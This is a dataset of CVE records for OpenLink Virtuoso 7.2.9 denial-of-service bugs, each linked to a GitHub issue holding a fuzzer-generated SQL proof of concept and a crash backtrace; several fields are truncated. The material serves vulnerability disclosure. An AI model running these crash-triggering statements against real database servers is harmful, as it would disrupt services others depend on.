#2 0x747... | virtuoso 7.2.9 crashed at dfe_qexp_list | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1125/comments | 1 | 2023-04-12T18:52:59Z | 2023-04-17T19:07:44Z | https://github.com/openlink/virtuoso-opensource/issues/1125 | 1,665,077,173 | 1,125 |
CVE-2023-31613 | 2023-05-15T15:15:11.867 | An issue in the __nss_database_lookup component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1121"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1121 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (c1 INT, c2 BINARY(100),c3 FLOAT);
INSERT INTO t1 VALUES (100,'abcdefghij',3.0);
CREATE TABLE t2 (c1 INT, c2 VARCHAR(100));
INSERT INTO t2 VALUES (2,'abcde');
UPDATE t1 SET c2 = (SELECT MAX(c1) FROM t2);
```
backtrace:
```c
#0 0x7fd63dbe3a7d (__ns... | virtuoso 7.2.9 crashed at __nss_database_lookup | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1121/comments | 0 | 2023-04-12T18:46:15Z | 2023-04-17T09:13:45Z | https://github.com/openlink/virtuoso-opensource/issues/1121 | 1,665,069,177 | 1,121 |
CVE-2023-31614 | 2023-05-15T15:15:11.913 | An issue in the mp_box_deserialize_string function in openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1117"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1117 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | ## Description
When running the following statement on an empty virtuoso-opensource database, the database just crashed:
```sql
SELECT table_name as name, 'TABLE' as type, '' as parentname FROM information_schema.tables
UNION
SELECT column_name as name, data_type as type, table_name as parentname FROM informati... | virtuoso *crashed* after running a SELECT statement | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1117/comments | 2 | 2023-04-10T17:55:59Z | 2023-04-17T09:13:46Z | https://github.com/openlink/virtuoso-opensource/issues/1117 | 1,661,128,936 | 1,117 |
CVE-2023-31615 | 2023-05-15T15:15:11.963 | An issue in the chash_array component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1124"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1124 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(x INTEGER UNIQUE);
CREATE TABLE k(v varchar(255), excluded varchar(255));
INSERT INTO t1(x, x, x, x, x, x, x) VALUES(16183,15638,6,0,5,2,0);
SELECT 'one', t1.* FROM t1 LEFT JOIN k ON t1.x=k.v WHERE k.v IS NULL;
```
backtrace:
```c
#0 0x4257c4 (chas... | virtuoso 7.2.9 crashed at chash_array | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1124/comments | 0 | 2023-04-12T18:50:37Z | 2023-04-14T12:55:18Z | https://github.com/openlink/virtuoso-opensource/issues/1124 | 1,665,074,357 | 1,124 |
CVE-2023-31616 | 2023-05-15T15:15:12.010 | An issue in the bif_mod component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1122"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1122 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT MOD(-9223372036854775808, -1);
```
backtrace:
```c
#0 0x66a32e (bif_mod+0xce)
#1 0x74ae62 (sqlr_run_bif_in_sandbox+0x392)
#2 0x79b598 (sqlp_patch_call_if_special_or_optimizable+0x1148)
#3 0xccffe7 (scn3yyparse+0xc5d7)
#4 0x6b995b (sql_compile_1+0x129b)
#5... | virtuoso 7.2.9 crashed at bif_mod | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1122/comments | 0 | 2023-04-12T18:47:44Z | 2023-04-14T08:12:11Z | https://github.com/openlink/virtuoso-opensource/issues/1122 | 1,665,070,884 | 1,122 |
CVE-2023-31617 | 2023-05-15T15:15:12.057 | An issue in the dk_set_delete component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1127"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1127 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE b (
folders VARCHAR(80),
folderid VARCHAR(80),
parentid VARCHAR(80),
rootid VARCHAR(80),
c INTEGER,
path VARCHAR(80),
id VARCHAR(80),
i VARCHAR(80),
d VARCHAR(80),
e VARCHAR(80),
f ... | virtuoso 7.2.9 crashed at dk_set_delete | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1127/comments | 0 | 2023-04-12T19:01:25Z | 2023-04-14T08:12:12Z | https://github.com/openlink/virtuoso-opensource/issues/1127 | 1,665,089,526 | 1,127 |
CVE-2023-31618 | 2023-05-15T15:15:12.110 | An issue in the sqlc_union_dt_wrap component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1136"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1136 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT SUM(v), COUNT(*) FROM gstest_empty
UNION ALL
SELECT SUM(v), NULL FROM gstest_empty
UNION ALL
SELECT NULL, COUNT(*) FROM gstest_empty
UNION ALL
SELECT NULL, NULL
```
backtrace:
```c
#0 0x81a65e (sqlc_union_dt_wrap+0x5e)
#1 0x81a783 (sqlc_union_order+0x33... | virtuoso 7.2.9 crashed at sqlc_union_dt_wrap | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1136/comments | 0 | 2023-04-12T19:34:10Z | 2023-04-14T08:12:15Z | https://github.com/openlink/virtuoso-opensource/issues/1136 | 1,665,129,009 | 1,136 |
CVE-2023-31619 | 2023-05-15T15:15:12.170 | An issue in the sch_name_to_object component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1133"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1133 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(x VARCHAR, k VARCHAR, v VARCHAR);
CREATE VIEW t1 AS SELECT x, x FROM t1;
UPDATE t1 SET x = x + 100;
```
backtrace:
```c
#0 0x6080d1 (sch_name_to_object+0x11)
#1 0x7dcf6f (sqlc_update_searched+0x6f)
#2 0x817cd1 (sqlc_update_view+0xaa1)
#3 0x7ddad0... | virtuoso 7.2.9 crashed at sch_name_to_object | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1133/comments | 1 | 2023-04-12T19:26:23Z | 2023-04-14T08:41:03Z | https://github.com/openlink/virtuoso-opensource/issues/1133 | 1,665,120,116 | 1,133 |
CVE-2023-31620 | 2023-05-15T15:15:12.237 | An issue in the dv_compare component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1128"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1128 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE element (
name VARCHAR(80),
test1 VARCHAR(80),
f1 VARCHAR(80),
f2 VARCHAR(80),
code INTEGER,
t1 VARCHAR(80),
a VARCHAR(80),
example VARCHAR(80),
b VARCHAR(80),
c VARCHAR(80),
folder... | virtuoso 7.2.9 crashed at dv_compare | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1128/comments | 0 | 2023-04-12T19:03:51Z | 2023-04-17T18:53:42Z | https://github.com/openlink/virtuoso-opensource/issues/1128 | 1,665,092,932 | 1,128 |
CVE-2023-31621 | 2023-05-15T15:15:12.300 | An issue in the kc_var_col component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1130"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1130 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE brin_test(a INTEGER NOT NULL);
INSERT INTO brin_test (a) VALUES(5);
INSERT INTO brin_test (a) VALUES(5);
ALTER TABLE brin_test ADD c1 VARCHAR(20) NOT NULL ;
UPDATE brin_test SET a = a + 1 WHERE a = 5;
```
backtrace:
```c
#0 0x5cfed5 (kc_var_col+0x1... | virtuoso 7.2.9 crashed at kc_var_col | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1130/comments | 0 | 2023-04-12T19:18:19Z | 2023-04-14T12:55:17Z | https://github.com/openlink/virtuoso-opensource/issues/1130 | 1,665,110,745 | 1,130 |
CVE-2023-31622 | 2023-05-15T15:15:12.347 | An issue in the sqlc_make_policy_trig component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1135"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1135 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
DELETE FROM ucview WHERE CURRENT OF c1;
```
backtrace:
```c
#0 0x7d8904 (sqlc_make_policy_trig+0x54)
#1 0x7ddf99 (sqlc_delete_pos+0x2e9)
#2 0x6b6e53 (sql_stmt_comp+0x453)
#3 0x6ba122 (sql_compile_1+0x1a62)
#4 0x7c8cd0 (stmt_set_query+0x340)
#5 0x7cabc2 (sf_sql_e... | virtuoso 7.2.9 crashed at sqlc_make_policy_trig | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1135/comments | 0 | 2023-04-12T19:32:30Z | 2023-04-14T08:12:14Z | https://github.com/openlink/virtuoso-opensource/issues/1135 | 1,665,127,014 | 1,135 |
CVE-2023-31623 | 2023-05-15T15:15:12.390 | An issue in the mp_box_copy component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1131"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1131 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(
x INTEGER PRIMARY KEY,
k VARCHAR
);
CREATE VIEW t1 AS SELECT k, k FROM t1;
UPDATE t1 SET k = k-1 WHERE k > 100 AND x = 128;
```
backtrace:
```c
#0 0xe086e9 (mp_box_copy+0x9)
#1 0xe08dd0 (mp_box_copy_tree+0xc0)
#2 0x815b3a (sqlc_col_t... | virtuoso 7.2.9 crashed at mp_box_copy | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1131/comments | 1 | 2023-04-12T19:21:09Z | 2023-04-14T08:41:41Z | https://github.com/openlink/virtuoso-opensource/issues/1131 | 1,665,114,015 | 1,131 |
CVE-2023-31624 | 2023-05-15T15:15:12.437 | An issue in the sinv_check_exp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1134"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1134 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE base_tbl (a int, b int);
CREATE VIEW rw_view1 AS SELECT * FROM base_tbl;
INSERT INTO rw_view1 VALUES (15);
```
backtrace:
```c
#0 0x788dc0 (sinv_check_exp+0x120)
#1 0x78a03d (sinv_sqlo_check_col_val+0xad)
#2 0x816d50 (sqlc_insert_view+0x330)
#3 0x6b... | virtuoso 7.2.9 crashed at sinv_check_exp | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1134/comments | 0 | 2023-04-12T19:29:32Z | 2023-04-14T08:12:14Z | https://github.com/openlink/virtuoso-opensource/issues/1134 | 1,665,123,657 | 1,134 |
CVE-2023-31625 | 2023-05-15T15:15:12.487 | An issue in the psiginfo component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1132"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1132 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
x LONG VARCHAR,
a INTEGER DEFAULT 0,
b LONG VARCHAR,
t2 LONG VARCHAR
);
CREATE VIEW t1 AS SELECT * FROM t1;
INSERT INTO t1(t2, x, x) VALUES('one-toasted,one-null', '', repeat('1234567890',50000));
```
backtrace:
```c
#0 0x7f42... | virtuoso 7.2.9 crashed at psiginfo (maybe the same as #1118) | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1132/comments | 1 | 2023-04-12T19:23:55Z | 2023-04-14T08:20:16Z | https://github.com/openlink/virtuoso-opensource/issues/1132 | 1,665,117,118 | 1,132 |
CVE-2023-31626 | 2023-05-15T15:15:12.540 | An issue in the gpf_notice component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1129"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1129 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | **This crash seems can only be reproduced when compiling virtuoso with --with-debug.**
**When using the docker container, the SQL statement will strangely make the client shell STUCK, but will not crash the server.**
The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t4 (
a VARCHAR,
b VARCHAR
);
... | virtuoso 7.2.9 crashed at gpf_notice | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1129/comments | 0 | 2023-04-12T19:16:37Z | 2023-04-14T08:12:13Z | https://github.com/openlink/virtuoso-opensource/issues/1129 | 1,665,108,794 | 1,129 |
CVE-2023-31627 | 2023-05-15T15:15:12.587 | An issue in the strhash component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1140"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1140 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
a varchar(255) DEFAULT NULL
);
SELECT * FROM t1 WHERE CONTAINS(*, 'tutorial & (mysql & -VÐƷWİ)');
```
backtrace:
```c
#0 0xdece40 (strhash+0x20)
#1 0xdec783 (id_hash_get+0x33)
#2 0x59c5d1 (tb_name_to_column+0x41)
#3 0x76aed1 (ot_is_defd+0x21... | virtuoso 7.2.9 crashed at strhash | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1140/comments | 0 | 2023-04-12T19:41:37Z | 2023-04-14T08:12:17Z | https://github.com/openlink/virtuoso-opensource/issues/1140 | 1,665,138,910 | 1,140 |
CVE-2023-31628 | 2023-05-15T15:15:12.633 | An issue in the stricmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1141"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1141 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
x VARCHAR,
k VARCHAR
);
CREATE VIEW t1 AS SELECT x, k FROM t1;
INSERT INTO t1 VALUES ('x', 'y');
```
backtrace:
```c
#0 0xeff7b6 (stricmp+0x6)
#1 0x607569 (strihashcmp+0x29)
#2 0xdec7af (id_hash_get+0x5f)
#3 0x607e58 (sch_name_to_object_... | virtuoso 7.2.9 crashed at stricmp (maybe the same as #1118) | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1141/comments | 1 | 2023-04-12T19:43:47Z | 2023-04-14T08:19:06Z | https://github.com/openlink/virtuoso-opensource/issues/1141 | 1,665,143,521 | 1,141 |
CVE-2023-31629 | 2023-05-15T15:15:12.677 | An issue in the sqlo_union_scope component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1139"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | https://github.com/openlink/virtuoso-opensource/issues/1139 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT CASE WHEN EXISTS (
SELECT 1 FROM t2 WHERE x=1 INTERSECT SELECT 1 FROM t2 WHERE y=2
)
THEN 1 ELSE 0 END;
```
backtrace:
```c
#0 0x76cd17 (sqlo_union_scope+0x67)
#1 0x76cd10 (sqlo_union_scope+0x60)
#2 0x76cd10 (sqlo_union_scope+0x60)
